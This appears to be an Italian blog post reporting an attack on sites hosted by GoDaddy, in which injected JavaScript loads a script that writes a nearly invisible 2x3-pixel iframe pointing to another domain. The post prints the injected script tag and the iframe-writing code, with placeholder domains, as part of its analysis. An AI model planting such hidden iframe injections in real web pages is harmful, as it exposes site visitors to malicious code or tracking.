Uno degli hosting provider più grandi al mondo, ovvero GoDaddy.com, da qualche giorno sembra essere sotto attacco.
Nello specifico, su alcuni siti viene iniettato del codice javascript simile al seguente:
<script type="text/javascript" src="http://certodominio/wp-content/uploads/process.js"></script>
Il contenuto dello script process.js è questo:
document.write('<iframesrc="http://altrodominio/t/5ad53fb3b6d8b22e91e679e16d77d767" width="2" height="3" frameborder="0"></iframe> ')
Ovvero tale script non fa altro che visualizzare in un iframe il contenuto di http://altrodominio/t/5ad53fb3b6d8b22e91e679e16d77d767
La suddetta URL mi lascia pensare che si tratti di un dominio creato appositamente per piazzarci sopra del codice malevolo oppure per carpire indirizzi IP ed informazioni varie relative ai visitatori.
Ho inoltre effettuato un whois verso domini coinvolti ed il risultato è che tutti e tre sono hostati su GoDaddy.com.
Registered through: GoDaddy.com, LLC (http://www.godaddy.com)
Soprattutto l'ultimo dominio, pur variando di caso in caso, risulta appartenere ad una persona specifica (vittima, secondo me, di un furto di identità).
A questo punto il sospetto rischia di diventare certezza...
Vi terrò comunque aggiornati.
A presto.